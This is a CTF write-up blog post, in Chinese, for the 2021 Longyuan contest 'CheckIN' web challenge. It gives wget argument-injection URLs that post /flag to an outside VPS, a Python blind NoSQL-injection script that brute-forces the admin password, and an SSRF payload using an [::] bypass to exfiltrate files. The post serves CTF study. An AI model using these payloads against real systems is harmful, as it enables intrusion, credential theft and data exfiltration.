陇原战“疫“2021网络安全大赛 Web CheckIN

最新推荐文章于 2023-03-17 23:43:02 发布
最新推荐文章于 2023-03-17 23:43:02 发布
阅读量3.1k 收藏 2
点赞数 1
分类专栏: 陇原战疫2021复现 文章标签: 安全 Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/122119385
版权

checkin

文章目录


参考链接: 利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入

题目有附件

image-20211223232855564

下载,是个go语言,审计一下 ,文件目录如下

image-20211223233017308

注意wget

image-20211223233141954

还有

image-20211223233200793

wget外带数据

根据上面的博客,可以执行命令wegt数据外带出来

wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/

然后既可以得到flag

image-20211223234002354

wget?argv=1&argv=--post-data&argv=/flag&argv=http://116.62.240.148:7777/

修改了配置-post-data 但是只是输出字符串罢了,我们传入的是/flag,那么它就返回我们/flag字符串

image-20211223234204240

分析官方wp

官方wp中添加了很多忽略的知识点

nosql注入

首先,源码中存在nosql注入

image-20211223234747022

所以可以根据这个获取admin的密码,脚本如下:

  1. 脚本中使用//将该行之后的代码进行注释,并且通过补全代码使得代码完整(有点废话了,肯定要完整,不然会报错的)
  2. 代码中判断是否成功用的是Pretend字符串,根据源码,如果用户名名称和密码判断不正确,就会返回含有Pretend的字符串

image-20211223235120536

爆破脚本

import requests

url = "http://47.117.125.220:8081/login"#自行修改

headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

strings = "1234567890abcdefghijklmnopqrstuvwxyz"

res = ""
#res长度从0开始
for i in range(len(res) + 1, 40):
    if len(res) == i - 1:
        for c in strings:
            data = {
                #注意这个substr用的是-号,是反向读取密码的,反向逐个读取密码,然后对比
                "username": "admin'&&this.password.substr(-" + str(i) + ")=='" + str(c + res) + "') {return true;}})//",
                "password": "123456"
            }
            r = requests.post(url=url, headers=headers, data=data)
            if "Pretend" in r.text:
                res = c + res
                print("[+] " + res)
                break
    else:
        print("[-] Failed")
        break

反向读取密码,substr实验分析

image-20211224000037063

image-20211224001209901

得到密码,登录,但是啥都没有,记录一下吧

image-20211224001219159

ssrf

官方wp中还提到了/proxy路由存在ssrf

func proxyController(c *gin.Context) {
    
    var url Url
    if err := c.ShouldBindJSON(&url); err != nil {
        c.JSON(500, gin.H{"msg": err})
        return
    }
    
    re := regexp.MustCompile("127.0.0.1|0.0.0.0|06433|0x|0177|localhost|ffff")
    if re.MatchString(url.Url) {
        c.JSON(403, gin.H{"msg": "Url Forbidden"})
        return
    }
    
    client := &http.Client{Timeout: 2 * time.Second}

    resp, err := client.Get(url.Url)
    if err != nil {
        c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
        return
    }
    defer resp.Body.Close()
    var buffer [512]byte
    result := bytes.NewBuffer(nil)
    for {
        n, err := resp.Body.Read(buffer[0:])
        result.Write(buffer[0:n])
        if err != nil && err == io.EOF {

            break
        } else if err != nil {
            c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
            return
        }
    }
    c.JSON(http.StatusOK, gin.H{"data": result.String()})
}

访问的时候可以通过[::]绕过对127.0.0.1的限制然后访问内网

并且wget路由可以用来发送请求(参数可控!!!!),那么就可以传入恶意的参数来获取服务器上文件并且外带出来,最终的payload(注意post发包改为application/json格式)

POST: /proxy

{"url":"http://[::]:8080/wget?argv=-e+http_proxy=http://47.xxx.xxx.220:2333&argv=--method=POST&argv=--body-file=/flag&argv=http://47.xxx.xxx.220:2333"}

image-20211224001806650

参考链接

  1. 利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入

  2. 陇原战疫2021网络安全大赛 Web_feng的博客-CSDN博客

Sk1y
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SUCTF web CheckIn
weixin_42499640的博客
08-19 2701
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
GKCTF2020 - WebCheckIN
ximo的博客
03-16 244
CheckIN 题目,代码审计: <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&gt
WMCTF2020 webweb_checkin完整题解
qq_38338511的博客
03-17 797
这里用的是UCS-2,当然我们也可以用UCS-4 (在这就不多举例了) ,也有常见的办法,base64和strip_tags等等,但是会有弊端。明显过滤了很多,但是我们可以用二次编码绕过,因为file_put_contents中调用伪协议,会对过滤器url解码一次。如何改成自己想要的一句话木马呢?php demo_0.php 运行后会在当前目录生成一个shell.php。首先要解决的是$content要传入什么可以绕过exit()用PHP UCS-2和Rot13编码/解码脚本。改成自己的一句话木马就行了。
[WMCTF2020]Web Check in 2.0
qq_62078839的博客
04-16 1518
启动靶机,打开发现源码 string(62) "Sandbox:/var/www/html/sandbox/cc551ab005b2e60fbdc88de809b2c4b1" <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/sandbox/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); var...
WMCTF2020 webweb_checkin
Firebasky的博客
08-04 2618
这道题是自己没有做出来,当时也没有认真做,最后看看来NU1L的wp才知道思路。 NU1L真的太强了,向他们看齐!!! 题目:web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);//remote_addr代表客户端的IP @mkdir($sandbox);//创建一个文件 @chdir($sandbox);.
BUUCTF_web_CheckIn
silence1_的博客
08-31 2178
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
checkin:会议签到 Web 应用程序
06-01
会议签到 Web 应用程序刷您的 ID 或输入您的信息以在任何会议上签到。依赖关系目前正在运行 , MySQL数据库Google Drive .NET SDK、Google Sheets .NET SDK、Google OAuth .NET SDK(用于 IEEECheckin.ASPDocs)版本...
checkin:SSM做的签到系统Web实现
04-29
SSM框架 实现简单的签到系统 sql 设计 create table user( user_id INT NOT NULL AUTO_INCREMENT, user_name VARCHAR(40) NOT NULL, user_email VARCHAR(100), user_password VARCHAR(100) NOT NULL, ...
checkin
03-18
【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,同时对深层链接的概念进行实践。深层...
信息安全_数据安全_When_the_One_You_Trust_Hurts_You.pdf
08-23
网络访问控制(Network Access Control, NAC)也是确保数据安全的关键工具,它可以限制和管理设备对网络资源的访问,防止未授权的访问和恶意软件的传播。例如,当检测到服务器与疑似恶意站点交互时,NAC系统可以立即...
利用命令注入外带数据的一些姿势
m0_59598029的博客
02-06 455
无论是在渗透测试还是ctf比赛中我们都可能会遇到目标应用把用户的输入当做系统命令或者系统命令的一部分去执行的情况。而在发现这个漏洞的之后,我们往往会利用它来获取系统的一些敏感信息或者直接获取shell,获取shell这一块咱们先不聊,单来聊一聊怎么从目标服务器获得敏感数据,先来看一个最简单的例子:从上图可以看到,我注入了一个windows的命令type,并利用它读取了missile-launch-code.txt文件的内容,而内容也直接回显到了响应中我想,这是大家最希望碰到的情况。
-bash: wget: 未找到命令_利用命令注入外带数据的一些姿势
weixin_39696665的博客
11-23 504
无论是在渗透测试还是ctf比赛中我们都可能会遇到目标应用把用户的输入当做系统命令或者系统命令的一部分去执行的情况。如果应用没有正确的验证、过滤用户的输入就会使得系统受到命令注入攻击,常见的有以下场景:使用用户提供的邮箱地址发送邮件的应用程序服务器监控类型的应用,他们会返回系统的健康状况,这些健康状况都是通过执行系统命令取得的使用第三方软件根据用户提供的输入实时生成报告的应用程序而在发现这个漏洞的之...
""2021网络安全大赛writeup
渗透测试研究中心
12-22 4061
Web1.Checkin解题思路这道题 前面根据 源码应该是 nosql注入,我分析的payload:username='||1){returntrue;}})//&password=123456盲注得admin/54a83850073b0f4c6862d5a1d48ea84fimporttimeimportrequestsimportstringsession=reque...
2021网络安全大赛_Crypto_复现
M3ng@L的博客
02-28 6850
2021网络安全大赛_Crypto_复现mostlycommonDecryption codeDecryption~codeDecryption codeeasytaskDecryption codeDecryption~codeDecryption codePerferencePerferencePerferenceCivet cat for PrinceDescriptionDescriptionDescriptionAnalysisAnalysisAna
“2021网络安全大赛部分WP
七堇年的博客
12-24 2015
""2021网络安全大赛WP
“2021网络安全大赛Writeup
Le1a's Blog
11-08 6122
Web CheckIN 源代码的这两处: 先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了 接着尝试利用wget的--post-file进行数据外带,读取源代码 在自己VPS开个监听并且构造: /wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/ 拿到flag: flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f} Misc
[2021网络安全大赛]eaaasyphp
cosmoslin的博客
11-11 3127
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
[]-Checkin完全复现
这周末在做梦的博客
01-28 720
[]-Checkin完全复现一,前言1主要原因2我的坚持二,题目描述1文件结构2 main.go源代码三,考点四,环境复现过程1环境变量设置(1)概述(2)修改(3)测试2连接数据库3 sessinit4复现后的main.go5 服务器复现五,playload复现1本地复现(1)直接使用wget说明复现(2)使用proxy进行ssrf说明复现(3)mongodb注入前辈的经验前辈的脚本2环境复现的瑕疵六,总结 一,前言 这是一场2021年11月7日的比赛,对于CTFers来说应该是过期的赛事了,那么
ctf网络安全大赛题库
最新发布
09-04
CTF(Capture The Flag)网络安全大赛题库是一个用于培训和测试网络安全技能的平台,它包含了各种类型的题目,如逆向工程(Reverse)、Web安全、密码学(Crypto)、杂项(Misc)等。在这个题库中,你可以找到多种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值